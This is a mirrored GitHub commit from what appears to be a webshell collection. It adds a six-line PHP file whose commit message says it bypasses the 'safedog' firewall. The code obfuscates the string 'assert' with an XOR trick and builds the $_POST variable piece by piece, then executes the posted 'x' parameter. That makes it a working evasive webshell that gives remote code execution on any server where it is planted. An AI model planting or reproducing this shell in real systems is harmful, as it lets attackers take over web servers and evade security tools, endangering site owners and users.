mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Create 2020.08.20.19.php
bypass by safedog https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
parent
12ad35eb0f
commit
cbd7b8ef98
1 changed files with 6 additions and 0 deletions
6
php/2020.08.20.19.php
Normal file
6
php/2020.08.20.19.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
$a = ('!'^'@').'s'.'s'.'e'.'r'.'t';
|
||||
$b='_'.'P'.'O'.'S'.'T';
|
||||
$c=$$b;
|
||||
$a($c['x']);
|
||||
?>
|
Loading…
Reference in a new issue